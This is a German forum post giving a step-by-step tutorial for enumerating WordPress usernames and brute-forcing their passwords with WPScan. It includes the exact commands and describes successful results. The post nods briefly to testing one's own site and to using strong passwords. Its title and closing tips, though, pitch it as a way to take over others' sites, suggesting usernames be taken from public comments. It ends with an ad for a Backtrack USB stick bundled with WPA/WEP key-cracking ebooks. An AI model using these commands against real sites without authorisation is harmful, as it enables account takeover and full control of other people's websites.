Sie sind nicht angemeldet.

1

Donnerstag, 6. September 2012, 07:41

WordPress Webseiten Username & Passwort hacken mit WPScan & Bruteforce-Attacke


WPScan ist ein Vulnerability Scanner der die Sicherheit von WordPress Installationen überprüft - wer also eine WordPress-Webseite im Netz hat, sollte diese unbedingt mal mit dem WPScan-Tool checken, ob irgendwelche Usernamen enumerable, also aufzählbar sind und somit herausgefunden werden können...
...denn wenn erst einmal ein Username (und dann eventuell auch noch der Admin) bekannt ist, kann man mit dem selbigen Tool und einer Passwortliste auch gleich das Userpasswort per Bruteforce hacken und sich somit volle Kontrolle über die WordPress Webseite verschaffen!



Schritt für Schritt Anleitung

Terminal öffnen: cd /pentest/web/wpscan




Um nach vorhandenen Usernamen zu scannen
ruby wpscan.rb -u http://www.webseite.de -e u




das angebotene Update besser verneinen, hab das 3x versucht mit verschiedenen Rechnern, und jedesmal funzt das Tool nach dem Update nicht mehr, da weitere Paketquellen fehlen sollen




Enumerating usernames -> 1 Username gefunden = Pentester




nun hacken wir noch das Passwort des Users Pentester mit einer Passwortliste und der Bruteforce-Methode
ruby wpscan.rb -u http://www.webseite.de -w /root/pwliste.txt --username Pentester




die Passwortliste wird abgeglichen




die Passwortliste wird abgeglichen - 4% complete




SUCCESS -> das richtige Passwort zum Username Pentester wurde gefunden: admin1234




PS. Warum bei manchen Webseiten keine Usernamen gefunden werden, bzw. bei einem Scan auch nicht immer jeder vorhandene User gefunden wird (oftmals sind noch weitere User vorhanden als aufgezeigt) ist mir leider bis jetzt noch ein Rätsel geblieben, aber vielleicht kommt ja jemand dahinter und kann dies hier noch posten, wann oder weshalb Usernamen enumerable sind und wann nicht (habe z.B. in einem forum gelesen das man ein /Zeichen hinter die Domain setzen soll, also wie z.B. www.domain.com/, aber funktioniert leider auch nicht!).

Da aber bei den Postings oder bzw. bei den Kommentaren auf den Webseiten die Usernamen ja mit veröffentlicht werden, ist es meisstens erst gar nicht nötig, den Usernamen zu scannen, vielmehr kann man gleich damit beginnen zu versuchen das Passwort zum User per Bruteforce zu entschlüsseln.

Also unbedingt ein sicheres und langes Passwort auswählen!


viel Erfolg
:thumbup:

Bootable USB-Stick mit Backtrack5 & den eBook's WPA/WPA2 & WEP Key Hack
zum Downloadshop - Bootable USB-Stick mit Backtrack5 & den eBook's WPA/WPA2 & WEP Key Hack



  • Bootable USB-Stick mit Backtrack5 & den eBook's WPA/WPA2 & WEP Key Hack
  • Downloadlink zur kostenlosen Software
Jetzt kaufen - zum Downloadshop



Thema bewerten
Besucherzhler code